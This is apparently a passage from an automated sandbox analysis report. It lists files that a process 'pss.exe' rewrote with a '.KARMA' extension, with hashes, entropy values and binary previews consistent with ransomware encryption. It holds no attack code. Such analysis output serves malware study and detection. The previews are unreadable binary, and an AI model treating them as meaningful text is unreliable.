SSDEEP:24:NiXlXg5YeFCyF0hrbmaQ1FcI6fQYNyKJ1f70DqmKNSBb:JeeFoG7X6jx1T0DhKoN
MD5:153CBBAD2A155368392A5A8D9234EAD3
SHA1:243184F53174C86794D968E18FF98852CFC7E516
SHA-256:929E64E4EF7BCC42B104589D007290CA58E25FBCF954173BF89FB656AB504562
SHA-512:02AFEDBD86BECCE6F2C766B33BD399FA1F13E4D416DB180F2FAE4EB2291257E0257A0F5B15B493EAD3527BCBCA8A0BB00B3013361E15850AFAE17A25A53942C5
Malicious:false
Preview: .iPM,.y.3...~..q.....v%.......:-...f....a.{.X..sy.k@..9...KARMA.1j.|.N.>I:.(B...As..$Q...Y....A../,.......?.Q&.......4.9R.....3.iRjA...z.vW..,...d...+ U.?...I..2...J..{[5qg.h....W..g.....^D.E....G......{}.....-...YA..b.q."ZhT...@.mU.v....v^W.......&W..~.2.f.....K(..?...E...aS..En..C2iU....1.U.p..O.4.o-%..#j...b..."Z.y,.(..(..+o.?.u...S....S@KW.i.F`..O.~..{.......n;...R.u}.&.I....Cpa....Uj..c..k*Q.-f.../&q.!3|.}.?zoI...l....{O..7.A......0."...l...f...hC.ppf.u. 5D.}.d......@.;].Oe.}...{...0....].'.......e.i......g...C.....L..i..$.^(....,A...UwV..#...E..'i@..T,@.b....M.......6.....^C...']O......aT.w..^X.R,U{..of.n...O.~..3...A.F.Jt.....U......P.Q...!.I?~..:.....M..J...X....|...[.L:}.Go@.U{5..v..^..Bd...TTWC...]H2....i.....\..-.C..pw..*.N*.....BM....K.h.J.Sj...R...|.!......+.B|.#......LKmg..C.._.5.a....h.~.3ORF.O.*.............r....U#...QQ.......C.'...4V.Z.....R.8......3.v.....MN..wa....6..U....]..~eH.......(....[.....>..*.L~
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805283204109685
Encrypted:false
SSDEEP:24:90yusAP4kqgexgb5bwB6QIixSPi5hIJng36jvhgzihHEh:90y6usOB6QR55hIi3ITHEh
MD5:949F8A1383A7234D478A1346ED21B277
SHA1:38AAAF1A42B3C76277990B4468C36DE38A8383F3
SHA-256:6E2ED81A575E78973BFE4D465B81BBA33CAB8787F5DD5ED27B266DDB9A155DD6
SHA-512:720061A77EF9C26D893D7B9C2588362C5889A7EB1F06756EE72D7B2900F135AF044B72FD74BB34DA3FBC0E74CB9DD2DCDB08CC6D6066176EE5364E4CC838FB9B
Malicious:false
Preview: ......V..T..Bt~....{.P..t.UQ.......!S#(Q..e;t.....b.....?bv)....KARMA..p..bHi.....[>/......F....^:....,8.3....B....\.c..j....a...r6C...... ....JH..+....Gf..3\D....u0gc..,.....:D.*.~.;]....oz...gE)1..2......s..Y4~y....pHqA...^..+....Hk...BSsU)%...3:.+..q..3|......!0.....e..)..c...a...AHN......k.65..i.oD...H.E...9...mh..vL..C.Z..mwx.../r.~.}mF....)..tx..m..L...SDx..RR.lzS.DsA{.k.|M.....p.....%..w"\..Q-nE5O.........y.f....9..p...IG...x.2X..8j2.~...ao.T;..rxq...W....M...{.......9.{.n....9g.>......s..5.h4m4d9..I2.95{.X.z..7.PyY......T.zi.9..3......X..-.`...}p.@.l..>. .g...t:i.R....mci....S..5.w[..=.yL..L}..7.i..M.FGS..J6...GU\..Nv.-.Bc.*!u....9.8..)r..q.....49..&....Y.........$.m"...58.m..-M~.p.g....Y.-...|x.tc[bZ\.D.2`.f.F....9..s.A..\..'..n.......N..YI.`;F.r{'..<..%0.x........;j....u.%....Z"....$-.VV2...7.b...]t...`...hI.v...YB.....'!=O.h..M..`o...P..r..bw`...v.D@.%..y.(...DS...{..M..Q..o....{x...ul....gb8.........0e..^........+..@\..b..D...WxP
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819085524610789
Encrypted:false
SSDEEP:24:sUA3KFlUtXrCsXOgoyIj/WyGxpu4SmIgOg5OIlwl6r:sUdlUtXrCsegoyIjupf1hls6r
MD5:2830897848C73689F8675CDC3EBE03FE
SHA1:AC4287CCD3BB12F3E742D76D5CA09D6C88EBDF96
SHA-256:FB76E0989C64FB44CD1F9992828259C37A49912A83337F521EDE9C9546B9CF60
SHA-512:8A903F19BE9C9E7A003FE8C7642A30BE2A30E10E03C9069EFD871422C05359E0139DAEFC215A4A97DDC708C46E5D4C23CE79197BBA62787658D1BB208475CA6B
Malicious:false
Preview: S..t.&AU3.`..w].@.p|A..*B.'*........h.jJ>..^|.....q_..p8..W....KARMA...w.{.n.E.d..Z.^.A..ME`J.U.~...j..7w.:?.@...D........h..)k.9.U..4....Tv.|*...6V/..h..,.......+}O.~...l......r..F...><A._5@H%.Ei..t.]#..R*k.......}.H.....L2.q..F..V../Ttz?B.U.o).*..@r...)K....tF.......D.......*..0=...w~+.......x....z.....j...........ytp.......`rZ.$.>.L.....p...0.l.F..Q.H..6...L.+d.S..4.....8=..8...O..@......0..hi. ....M...y.......`qO-.{...f6.d..hb...$.yK-.4.q.C.U<H...d...K.......V....... g....... .l......'D.......+......\.x..5.f6..R.L..O.'.W..'M..1....d..<...X.{^.."Mx.$g.2..v0..7..L..F.g.....K.....c/.2........[...Pox.5...{i.C-o.............#..t/..>..N_}'..Z.c....-Cq.no.3..a.[v....m..*...|.xS..<S.L.!z.$f2m9.9..3a....r.9......i;._.[......a.(.........T.\...@....dWCn....K..)..#py...`.......3<...d.M.gyN...........4[..Q"0....H.N!).T..t..zhY...y.@...Z/..Z..{F.Z~=Kj.........bj#.2.D.w...kDb.c.Zp'..^#&.=.i.4.I..".S4nL".LD...O.......G..G.Sl......B..{f.~......W...4Pb.N.0
C:\Documents and Settings\user\Desktop\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.794045729889145
Encrypted:false
SSDEEP:24:P3kR5g36plNhY2o7aFvqyAza+O0/ivbq6jsv/GKtHyrV:fWB/NEaFyyPx0/JSsv/GKt6V
MD5:6E0F01658FA8A0EDCEC14B83802F3AC1
SHA1:6BF831E63417E34526D9BB0C38D79A452FD57DC6
SHA-256:0873B2645758BFD356DC9FCE539B20FDB710E7E01DBC791CFD5930FF4C7EA80B
SHA-512:17C5BF442CF7B9B60A6EAB780610F86236EB4F55B8F3EC7C2002862012B162190088B15A8EF0E2CDE0649CE2A23E7E8716AD716A8B26741560830384402A427C
Malicious:false
Preview: .....0.....x...C.wT."(.H.....5..L..N..s...K..n..X..Z.........KARMA.......?).8.&D$.}...Cb.......76..._;U.%..*.Y..9....M.6.h.......+.5..%......q.#..s.....t`.m....j4.e.H%o....PY...(QoO.zGZ..w.eV....:...P..t..4&.{.S.B"y1j.....Y.I.D9_.\..K....0[...I....|.i..........{............9)..?9vz..M.{P]P_8.m....Pv.7..s.Y\_L...ey.....v...Q1.....W.L..)...@.!l...r......t.`.H...=#*U...t..(..e+N.,....IjUN....t..!.........I\E..=.....e...JDS,O..)./.t......>.>...}.]...o.lI..K..%...+.].$B.ax..Y?"n.K{.W/....Kd.dv_.."6^.6.\.K..I..*.......C.m#.E..HX.J.9..(h._..x...6.(....~A...x....`...C.....A.s..Li...@.....?..^.z>...."$.\O...........,.`h.....J.<X...U6.!.........X..2......D;.s..}.u..Nd.e..^..E.c4*.`.6.&....l.'S._!m....L...o{69..3'......K:...r...Y..v.....Uk.n5..;.(...]..!....Z....Z....e....C..,..#......Ce..+.d..=.;`.kA..........a;<..Y..............T..:...I'....'K3.'..u......n.F.?..(_k.i5....}.....`...*..*.. .7h...B&^}Q.9g...2.sU(Y....tV.....J....W...*.7....are..,.
C:\Documents and Settings\user\Desktop\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8058274128306415
Encrypted:false
SSDEEP:24:gy1qVYxcJ4xYwQ3wvWRqM45pfGSQVfR1ZWJYN/XBQW5Uu4KH8RaC:S/rRwA43fjQVfKYt7U1KWf
MD5:8C94F123593C1EFDFEB0E2D80A570B90
SHA1:9A98EE225652380F456FC8AA01FA4103E0FFFD62
SHA-256:876232C6DBE6200C91625D68990C04EA673349AD9AA437D7C8BC05D8C4F1C7AF
SHA-512:54F68FF974542104CDED40B11A2187AB976A31EF031B92DF6B0DAF6B8BB0BF0E34D8BE5453248323CD0D5BF174803CC260909D67F3CF69A67380A5B44335C923
Malicious:false
Preview: ..N........}u%..wSt.C......l...(..p...r.....9...#.....KARMA+.....q.<..xJ0....|.....~...|.....(...L./.MY).......v.........'...y..+...R*G.._.*i.E.P|...t>...]...#.......*......=.dM7h.C..zIV.".h./%..".Q.H..-&ji... ..........a.D....]..x......Z....r8....M+..t..y.K...Z..Z~Z...2..feS>...nse...B.<..W..d.)......j.%.....t.].0..R...Ip]..:..Ki4.....'....qF.K............ <..nTT'..mB..+...gr..yKy.FA..B.`..C....i......pE..VL.........Z....|.......F.8.T...8.Q#......d...'..e<.0l..,|kd.n.F..%..5...V........D..t...M1....\.LL..MO'.m...."XWe......v..n.....9.......e...^WW.;..qGQ...>.qh..[..hu...?..\....;.+.../.-/..N_....A...P.B.rR.H..8..=S.~.TG....m+._.6z.o.... &.`>0.5E.+6......O.....Q..S.(J.UZ..z@...M........g;.....ys...9..t.2........<;j..De/...0X..=..[;V`&I.]......-..<~1..T..........K5Aq ........T.54......f.3.5oo......d.".X3YmW.@%.(Y.....$..-.o...S.>@@..Y..0.h.6U..[.*3..h.......Kn~..9.&.e."...1.`C6.).l.6w.eF9..Ao (..&.\C.%.f...4......~:.N7.&.j.
C:\Documents and Settings\user\Desktop\PIVFAGEAAV.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814709505401737
Encrypted:false
SSDEEP:24:pjxRzR/cl8GJDSEip0k62HDItLV7hxDBMCoul27:ptzGJPi2ktItN/DBMB
MD5:B00B584A51FCA2251D7F1C7958B054EF
SHA1:868EECB137351B8F7BFF8307A4757636DEAEF53F
SHA-256:02636A1FBFE2D7DCB4FF45F38DF2F9BBBEDBC6B00261681AA652A31E7A37DE66
SHA-512:AF523544F9297E8A051D3C1216CCC944DA915A8D450076839223272063EE30C279A265F6FE22886B22D0DB8A3130D30363E75ECDA9B5AB74313BD404E59710F8
Malicious:false
Preview: .......c...`...Vdc.....L..LU......?U>(..<L.~...$.H].o....q<...KARMA....L.... ....R.{.{E+..4.x...Z.#.....K9.".c.._{.l...e..b-..O.Y.X..WY3.7..%.\jN...I";.r....=....[..-.g/,...O...W..L...m....>.|..$Q..G......Pt:y..b...G>R...Q.{o.Bw..#.U..............N...4+LE..PN......O..#...._g.'.,k..e..[.C;...{)-.0..;...}....|.%.par?q.F..nr..9+.d.R@.V.K..tr..*..K"V.K].q.BSn.l.....2.."$.....Xa{..a3z/g.........-.C.....P.o-.vP2.9..O7e\..D9...C...YS....5:.[..T..~..PK.7....m..+.o.C!>`....wU.e...)[.b.-.U....;.F..H.L../\.=......ib..#.N.r..#*Z..........g....:f.."..D...*....a....!....L...G9O....w..k. n......".l..g......&.o5^..&.3.~Q.....%.H.Gn.-a.j...M...... .Z.\!.{.~t.@..V.k-P....$ .^m...|.Lk.X.....z......f.i._r..u.v.TM/h.'..>.w.&..|.CO.}rK..}..C..<....{.t?8.......P}.;^.B.P.S....Wk~c..!w|...j.....Bc7...O....-h|...*RUG1.....r...h.8{...{p5..%8.....I..v<.v...u.....8..=9.......n..O2$;....u..v.G.mc......P.'R....;L4....7p....<...CK/!........P...D. Se..b..i...b.FJ.6.J.+...
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813496593107111
Encrypted:false
SSDEEP:24:KkeZeEHreiz/vxc3/utxsu/SKRzpQD/6YqpIK0mb9uDZh4880xm:he7SavmPwtqUGeYYIpmxAv4t0E
MD5:A205E562AC6B5C8B484AB016FCDA48EB
SHA1:902F5E3A73E26B1EE1D4758201276590EDADAB6E
SHA-256:42AA8EF0CF941B62D91C2447EB5EBCD8013E2EE4E5B5B892B384048F095A27C8
SHA-512:881554A6E9DB24FC8550E03AC51B4BC0D7A84D822ACAB4898DC579662E756345B48B488D9DAF743BD53949125CC9C77B55E5CFFB0FF97E7AD2367EE5FFF7610C
Malicious:false
Preview: .6..c.7....c.?DF$S.@..K.4....G...{&x..<...R.....7...^."......KARMA;.Y.|[....*.._n.n....(..gQD..'.S...1.-UEYC.[hC..-.r.....$....|....u....8?...c..QjBY...v..R..C...N.+..\.-.....+R.....{.-.^....#.}...|........3..'...Z.FEJ.....!....w,..Z.G....kM....4..u..Z......Fd..A8.aL....,........o..R..)F..X..Y..&&k.Za}C.L..y....~o.A.U...7Uz7.....y...............#..F.4..CL."..e>.n.....).es[...x&\^....9bN........?...{..}R...+=;e.&...b..YT3....U............nJ..;O]$"...=..l...2.Z/......82......a..K.sZ#... 0.2... .8s./..v...|..._.:q&.]...d5AP...:..@.%^D8TQ...Q].+.bDa..%..yL.w.....!&..Q... 4.0A.-.....ZF..O......@..K.....Q....r+...u.P."..rO.x..Z.\....3..$yF...l.V..4..?..4O...h..a.!R{..G.F$.........BU.\I..k$b......{....p..5..a7....c7.@.....g..A....._..es{G.24....b.._KM....5......9...w...h. ..s..y..A.z...5.N......2da..K,...B.!..........tE.,. "5..N.VW..&R.....?Y.]=w.(.g.e.../=t.lO.#.9.TVs.0..E...f..f..x.%..W...........M..../.C'..]..%.....`.;.H3...i..K..r...E.
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8171099113409985
Encrypted:false
SSDEEP:24:5d4VGtLCaz2/NCa4kCFKW+ApqZki6M6N9BOg2SIjJbjrF2q03MHsJqX:lth2/NCOCvpuEMunxbmJ3rFNMYX
MD5:0794AA12560655EA0D1A26CF29B24E01
SHA1:485976A464B7362A6F19E9BDAED0BE2F79A53F20
SHA-256:07C5859268AEA636072CFB40517E3AFA9D56D6135EA6FD2A04AD84FAD72D2045
SHA-512:71C3EFA86A0E2959F2E2746056DC330EB7D8C2EE9FA959D2E6766274E5BC99A231B38FB0F9FD618B5CE3A044E50F4835369320127EF6473268D5A8CAB9FD3072
Malicious:false
Preview: ..q.7..."....7.oGY........u......gD..R....`.8..'.....H...2...KARMA.)..xj..*{..Q...V.Ky.V.`...iH.\?.]..P."Uc...,y....!.'......B..x.6.....<e,..w..ea%.z..Wy..b.].5..39<Yd..{.*...a..H|tx6~8..bv.FC6.}.TH.kO6&....0.h.....;.9..=.25...B~H.....l.V..d.z........<](.z..x.Q.....7..QM../.Y.......$.I.._.x.0.nu......J...j../<h....'.U.....Hw.+K..6T..J*EW.Z.:..;.....$....../..Q..h.....9..p.M.y.A..3....&.Q...V.....W..1.i.......!&}..i.EOp..bX..M.(..L5..m@<..aA.!y..4Z...........,.`.........#!F....s.@.m.=6.2...%....1g.....lJph..O.y..Q..v......FV2..m:.y..z.r>f..T)4Y`M5eK1.6m...y..5..5..?,1.....o&g>.H....${V.b.....E..:..2..C.1K|FO...>.m.-............&Q..-.. .f.o..F.b.92..Q2..:3.........@...d..A...#"..JK}.#I...rK....Z2b.\.......7.....r..M. h.f...F.`...8..9.uRw..:.a.]/.3OX.G....X.Mflh.lu..~....0.R[...M...h.7..R...pWt..Y...D......./.....1.].....T.F..oH...G...hg1.a}q..N./.._..Bf..k.}-...I.....g...........~...........+E.^.@p....?.W.....R.eu..k/.._....p.h.)d...+...Z....d
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812082298645967
Encrypted:false
SSDEEP:24:zHlAn+u02GZDxIk4G93zbVUHsODK6ZW/Nm+u:zlA+uT6D6k4mj6HZZW/0d
MD5:E7FC888E4C02A9C87CA616628478458C
SHA1:ABB92988C0027BCAB61A3F450AB23DD97F1BC305
SHA-256:A11A9A59F8E7B026407604E10C6CD045B4C83272310604067E5659CAAE3E33B8
SHA-512:6C29D80EF0EFBBD82872A2251741CFCB0247D75D6210B162C7F68FBAA0E215E9D6632B0A61B3025DA044834C527310D844CA2D62DBEE8D6185719D4C7D3CB72C
Malicious:false
Preview: .sg.;z......._<~.s...y.~?.........Aq:6.,..5Yq..!*....H.7..5...KARMA......G..t.D.e(~(......XY.u;...tR.....x.l..C. G$%6R&..t..,.v...*.eb.....k....A...e....R'b~...h.1STxsM:~x-/..-z...<...b..3`j>......C...9a-..k.].~j.._m\...).,.4.G<.....k.!,...M4`.89.N...<.!.5.L.~.ty?.d......N.....t.I.j.>..."a[.~..ARk<.S....O~.p...'u.B.cI`.G....a.k..s..(.<...t.gn.L.3.F......m.gJ..qU5...;B.P.&&..F.G]d..sI(.2..............%.5.e..P...1..K1.B.2+V..E.....y.w>A.c....(.......1E.~.3..z./.r.....nK......S...8UB.F...gzp......|4.lIR=]5.8..~.R......!~j.1........^..4W.?.+....K.D9.wg.....2t....v.L...4@....S..5....y.R.....W...W..$a.|oiw....<.Z.vW.....A..j.g.dC...V\a.C...v..7~,0.L.....#nJ)...3..C..C.....>..sGe..b..4,.a.3.^...X>p......]...`).."s.@....2.B.R.....h).*i&g.V.....4..2...q............3.YJq..'........3..+ +.7.....D....mOY..w.E..{../.pP..\...)1D.`.{.;.oke.nE.O..Z.%...q.......~..7.&..-!.1.((e....E..X...T....<........o..G...]...:....'...,.....D.....m.vS..+.@..L...fS.G.....s
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814750325268285
Encrypted:false
SSDEEP:24:bEuOEjn5aUa7SpwFRC+VYtMR2XXC8QOBmbCvTMynVypXvt1VuLCfp:g3Et/kq+x8j+YTXVyp1R
MD5:9B6B985952E08B8F0B5743114B52E876
SHA1:124A9174AAB93FBCC846011CA90EEEC2A4EF23D9
SHA-256:4705E3B5138E3C946EB24D3AE4F096C229CCF38955B9D8D88CCEF5D0419950F7
SHA-512:1D3360758E5C672F9FC08A1A1002E5678CE04D3EC7F2E83390137AA02FC6D45740473EEFAEDA9FAA6A854FAB74B3DAE09152B6F233B904EAE1BED5ABD5B587B5
Malicious:false
Preview: QI.K....q....i..qI>.r......5....<...o..v.^..)#...f.Zx\.%.....KARMA.Y..6sh.q..(...l..Q.8..Z-Q.mY.+.S..Q..j.h:.....0.......|.r:.A.Pp=.a...}..J..#Bk6V...H..B.<.D8.HT..)/L....."r..5f....-o.D...F...o.B(...Y...8..9..a...4.?.....`.a.".?..l.~.).....@.`T..f.qb.XD...:..Co....O{....B?.....'.ck._...S......._./.v..._...f..._.8...5wx\...w..>...t..6....|.L`.[.b.&.K..vq&.X.Z..n.U-..f......I..R.:.....h.....H.W5.V.T[G.x...!5.F....i'.......O...:.f.;bp.y.0.;..H)9.p..C..V.OBL.}.x...'%....$KT.([.....Dx.p.f-{...Y..{!])..A*5...aRf....N..h.#t.?...P....s.K.T.;.cx...}\.....<.M.s).*.7.E....m...Z..//8...~......l.v...R.8X.R......7....`.......5.~yo..A..A#.U...H2..~..o.N..j0.*<R....%.D..smY..I..AEe^d.j.l...z...Ic.`...p..m..}.A..0....m.g...&..O.%..9...P.j..HA......E#...*.....$..Tx<.:.b#..t..{...d....W.%&.O.....f...\.<.S..dF.].{v]..j2._.C.....J,x..n....&..B..|.._3>.:Z....I0^.=<....P...3+..2..9..6Q..6......l;2..n.......z-...+..j.....c.N..%Q.ek=\......_...rd...7zD:
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.817306123264909
Encrypted:false
SSDEEP:24:ibdDsaS8XRKaGYuCqDdgGOQtL2CDQAbwvrqQ8PanZQi:0dDsaS8vGYuCMqQB2KQAdQ8oZN
MD5:13E280C28A34F5B5497905B4FB375793
SHA1:1CCCB7DC8B06C6C6B1FEB5541B9D8060A7D361E7
SHA-256:57DFA63D1974B1AE2A52623B716004CC2BBE200BA126354944F27B41583E02E8
SHA-512:ED80FBF58642E0CE1D471B0C9E46C7759E11252F53C54F6AB4F1926D3A4B6445008846E6D93CE6922C9F12F8B9DE313D15F90D9E612D8DFA67E8C192FC9AB379
Malicious:false
Preview: gkF...S..;.?...AN.qFi8..o.......U.&..4.O#h..,:.|.z..D.vw~...KARMAz.5.......L)..u.6#.....S7IlW..f%....[.G...n..\8...'!.[.86P..\.6.e..6[...?..^<.....x..bO......@GVx`.f.x...].2...^b.#..8.q.C.'..2.d~.wu...}.x.....R..7.-.......&.3......XWd(..H..h-..5...+...jn.@..A.:v....<E.."..cP.1..J..i. ....?.Q\_;.V.%.:....x.p6.q.L.....\...R.. ...:...$.....7..x.(.f..;..dk..<&.....=emeJ.c...a.4.e.......5..."........,gO.o.....{..3...?.w:...Jb?s..8.h.q..\.|.......F.....kl....fz.mS5....N->.tZ..H.j....K.....ax.x..x.)..>......,....3.Tc..u>aL>..5,&!..-...!......C..n.a.>...8KDe...M&.....e.J..XA.Dz...M..'.3..,./...D....K.U.j.hEH...zd...............G..'`..,..X...1+.._...(....E.B-..FK.La.j.......}.$.Mt.\0..<.&U-..%..]1.....>L..y...^&@..M......sU....1\u..S|..If./U.......>..0..!.{o....[p&"A/.1....N....E.}...b'~..=R+x7...P..8 .........+.7.._..S.e.&.?....;.....{I....M...........t....~..(1...T.....T..a.$.........S...&........;.yGw.u.;..K?.....s......X.z...n.#.W....W;..
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832821038591339
Encrypted:false
SSDEEP:24:DXoR2+K0WEH7nEvzafJGI7KDGjVVIYOq1Wpnt6k9hB4CJKhYXlF:k53B7Ev2G7DGxlJPkbB4CJKKH
MD5:1973B01FB305EA4D713B78494611E6E4
SHA1:0973C43CE62C784456C3AF6D76F7BBE7DC0783A9
SHA-256:8BAA63935DEE483E1A2F866D40E14B264558AAF01F1EAEE329C47ED391BC6BF7
SHA-512:D6D655D524D4401799CA5EF3A268B4B37272B12FDC22D9FB9C8AE45075F6E803640484F19D5F0F03F789D71810328FC7345C891E549AE275FCFC0F86688EF9F6
Malicious:false
Preview: ....v.P..3@.D$'sQA.....tqJG...2.......;Lj....?....IOi..._...KARMA.8...=h ./.t\..6V..y.;..6..WHe....S......)........goO..z.k...hJ%T.3..cY..]....$...............<mH6...T..........*...bS.Nl...t".&l..(.wM^....Y.y/.8.XL..a...n.#.!.`.y..=..`...#......KiI...'$._.~.d.D..\}buZ.\..1hHh.+....Z=.3.N....1$..W.k.Y....Uq..i.`....U..rhn...#..UN.ghc..t.$Gl.gw.PD%.O...^WIj.XS..W....:......+B...\..2.`....*.../....u@I_P.....|.:U......L..E>WY..lPd,.7Yb.[.....a...%f=........k...+.........a.M9.7I..c...~.......`~r7.1t.Y(:5-..\..V?......|.Wu"........s.....B..........6V..k....9..4..Y.8^...9.RZ..v.o....3]....D~.bJ!T..858i..?..k.._.6.h..Y...b)a.^.b..r..!.,z....d+.q.qp$.nT.....?%8......../{.t1.s3N....@...i*..b..Z.!zb.....i.O....p..p.)...;.4H+..R...0U.jQ...Q.H.N~2.....A....}l.)7&../&`..pO.b.$..@/..W.......K.pO..L.l.m.&...=i....m.h...t;...=.5..c..F.I.......')...&?....xO..?..VL.J..E._B=."].U..F.v'...p%.....,g.k.MYJR..b..... 0..!.3......./@...{.frZ.t.u.,..(....+].
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822508114103896
Encrypted:false
SSDEEP:24:EpdJ6rZ/1S629p1MDGuul2lvhTpoUE6M0CkY7ykcD:Epz6rqdz1M82lvhTpUkY7u
MD5:6C760643E8596CC1A14C377C6BCDB385
SHA1:6D736740E73199DD2EA270F7FD4B3B991F9B2017
SHA-256:D1A707297AC0953110B9E23DECDA8370478CE5997F188FF5232BA3797F937DAD
SHA-512:3B80A474B388DB9FAB8AF1ECD289FBAD2082A1FE83A22806C6D43A608B5870DC70ED6C2BF6DA664435E6F5D9EEA6587A94515008BA283FB16925A200AE918DC7
Malicious:false
Preview: Lp.H.py.l..&5........P{t........ ...$.A.m.fou...y?.bB.DUp...KARMA`\@...+....._..T..O....m.I..N*.......t<z..L......J.../T.......'l..I..b.g_...J.gb..".n_m.@x....#Q.......`.....P....RW..*1}....i1...m..#p'%O.....X'...8;....N.[......kg.7.6...#..Q@...1..P......W...oO.~.9..`..S..j.rO.=..E/."......}.N...W.T..D......K2"...kl\....{.vg...8Dr7uhw....|...7)......!]...?.C[..).R...d....X.J....z.`.HwL&.)..a........'eE.3`...\>....r].|o..Hai......A.....a0.5...<.g...Q.8%.C.v....[hx.]?.;.....{.\..{g.........d.&.......x.%LU.J.p....Lx..#.......)+.X.x.0z....c....4=..[r.q_-.iY...).,b\.4........`85.\.x.0.............g.eR<..FG.(I... S.50.]".. ..[.'4 ...p.v.....,L..R.k.+E.B.....D..b.J.o........WT.F../.......(.g.I.. [...S..\..^F&...+.t ..u......~..b.......9^.Z.8.H ...O.6...z....4.......S..p?w..P}}4..UR.;^..$w^do.$..%...sbQ.Q......#...^ .r+*..qD...R.....m...4..-.........,5a...9....p\..iB...I..<-. q.j.:1.SP.9K....%rY....)..|...S|.........v?=.....l......yo
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828951016468186
Encrypted:false
SSDEEP:24:HNMS+nk3DhKfGGFWNYgo38vQz6BO57l3qtnwX9jAv:HNt+nklKeGFbgRQz9Bl3+69U
MD5:C7A4A386326626AC49A1AF5F8F333D2A
SHA1:BC11135C3D8384F8B1C8E7EF1F66DA4A86599B4F
SHA-256:49801119F049BB2D2B3371D4ED0C72A858B2DDB3FCC29AB7F25CC06A06C835B2
SHA-512:E20CCB7FCF89FEC1166B46B6CD2D0CEF68DC5AA599AD293AE12E0485A8131CD8B4B2FDDFE19EEC2F79ABFC070DED9E5783814D660DC5F53FA275B599897821F6
Malicious:false
Preview: ..7bF.@x9E1d0.........B..]......==..0BEUX...K.T.[....4:6..8]...KARMAY..."o.u..:z....9.@..h...9.`OzY............=3..5.`.......qI.:...5.....f6.......^........f'@S..W|.0..}..T/.........l\.....L%....Z.....X.Vb....w..S..........{..!..ta......*.....u....$....7.&hS.V....M.0.n.W`n.. i.q<..............U/zz.[..!....X.=E_Q.PV9.5.......<rn....V.&u>.e...SDF.X......V..o........T..y.[C..@>.._6........h.../.M..lU..*...\z.|o.....f..m1C..|.."...Ke.b....O....o..)o=H....>..P.~.aZ.@i..w.W.G.m...0.....x..G-1@9.......$..l.._.W.w.7..t/...0....+.....KCR}t..e0.% .....rQE.. MQ...K.i].P..A.`.m.. .....{.34..3...t.g_..\.L,....C.|..o....?..h..L...........s..]./@....dD.j.Q.dm........G..C.[.o]BQ.m.;.....]..A#]D...#...1c..}V.%F ...~.T.`w.%.....O....5.2...T1%}.....*...7Yot*...J...4..#...H.].q...}.%........kWa..2.....<..]..K..s.P..Jt...>z..?YEr....Y.x..9......[....Z.......@r...j.j.&..g....t~P.. ,..E.;..$H.N.....#..JF=...v..Fpe|P......D.;..........l..4..H'...`......NO.D..K..#....f@.c
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.849687165675415
Encrypted:false
SSDEEP:24:mPzQDmzFo5xv0tpF7yYOwp+6r0AljYmv9HYjRvcV:mrOm2ctp5ywvvj/HKRe
MD5:A4B04415DC253B5089E71C7576D8DFB8
SHA1:7116627769B1AD762E28F67ABEA00E33F4FD5372
SHA-256:90D6423644A86B1448EB2AFCDBA4F534A948367723AE41018ECDE2F4BD81B761
SHA-512:AE1A62FDB1497A566A5F4E7E1EAFC6C7B1E5D0433471C982874D33AAFFFB245D88CDCC7744117A5726D5753074D7F4AE36650391EB700D16E6A8780BC45F7369
Malicious:false
